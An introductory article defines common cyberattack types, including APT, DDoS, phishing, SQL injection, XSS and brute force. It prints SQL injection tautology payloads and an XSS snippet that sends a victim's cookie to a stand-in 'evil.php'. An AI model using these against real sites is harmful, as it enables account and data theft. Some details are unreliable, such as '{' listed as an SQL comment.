Cybersecurity — Understanding the Fundamentals IV (Attack Types)
Even though there are many types of cyberattacks out there, below, we try to list the most common types of them.
I. Advanced Persistent Threat (APT) Attacks
APT is a sophisticated, possibly long-running computer hack that is perpetrated by large, well-funded organizations such as governments.
- Advanced; Operatives behind APT have a full range of insight gathering strategies available to them.
- Persistent; Operative’s main aim is to maintain long-term access to the targets to execute a specific task.
- Threat; APTs are so advanced and sophisticated. They are huge threats to intellectual property (e.g. trade secrets or patents), sensitive information (e.g. military secrets), critical infrastructures (e.g. SCADA systems, nuclear plants) and total site takeovers which makes them one of the most concerned cyber threats nowadays.
Stuxnet (a computer worm), the most known APT, is first uncovered in 2010, thought to have been in development since at least 2005 that was developed for causing substantial damage to Iran’s nuclear program.
II. Denial-of-service (DoS) and Distributed-denial-of-service (DDoS) Attacks
The purpose of denial-of-service (DoS) attacks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
Distributed-denial-of-service (DDoS) attack is typically a virus installed on many computers (hundreds, thousands) activates at the same time and flood a target with traffic to the point the server becomes overwhelmed.
Please note that DoS and DDoS are not the same things. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.
III. Man-in-the-middle (MitM) Attack
Man-in-the-middle (MitM) attack is hijacking a session between a trusted client and a network server. A MitM attack can succeed only when the attacker impersonates each endpoint sufficiently well.
IV. Phishing and Spear-phishing Attacks
Phishing is an attack that sends an email or displays a Web announcement that falsely claims to be from a legitimate enterprise in an attempt to trick the user into surrendering private information.
Spare phishing is an email targeted at a specific individual or department within an organization that appears to be from a trusted source.
When spare phishing attacks directed specifically at senior executives and other high-profile targets it is called whaling.
Clone phishing is a sort of phishing attack whereby an authentic, and recently conveyed, an email containing an attachment or link has had its substance and recipient address(es) taken and used to make an almost identical or cloned email.
V. SQL Injection (SQLI) Attacks
Code injection is the exploitation of a computer bug that is caused by processing invalid data. When malicious Structured Query Language (SQL) statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker) it is called SQL injection attacks.
Since 2007, the Open Web Application Security Project (OWASP) considers SQLI attacks as one of the top 10 web application vulnerabilities.
A. Incorrectly Filtered Escape Characters
This kind of attack happens when user input is not filtered for escape characters and is then passed into an SQL statement. Here is the code line for illustration.
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
There are three types of SQL comments as shown below. All three lines have space at the end;
' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*
B. Blind SQL Injection
When a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker, Blind SQL injection is used.
C. Second-order SQL Injection
When submitted values contain malicious commands that are stored rather than executed immediately, it is named Second-order SQL Injection
VI. Cross-site Scripting (XSS) Attack
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end-user. As an example, if the application doesn’t validate the input data, the attacker can easily steal a cookie from an authenticated user as shown below.
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
VII. Brute-force and Dictionary Attacks
A brute-force attack is an attack on passwords or encryption that tries every possible password or encryption key.
Dictionary attack utilizes a wordlist in the hopes that the user’s password is a commonly used word or a password seen in previous sites.
Hydra, Aircrack-ng, Cain and Abel, Crack, DaveGrohl, Hashcat, John the Ripper, L0phtCrack, Ophcrack, RainbowCrack are some programs that can perform both brute-force and dictionary attacks.
VIII. Drive-by Download Attack
An attack on an innocent victim machine where content is downloaded without the user’s knowledge. It is done by an attacker by planting a malicious script into HTTP or PHP code on one of the pages.
This type of attack can be done in two ways;
- A person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet) automatically.
- Any download that happens without a person’s knowledge, often a computer virus, spyware, malware.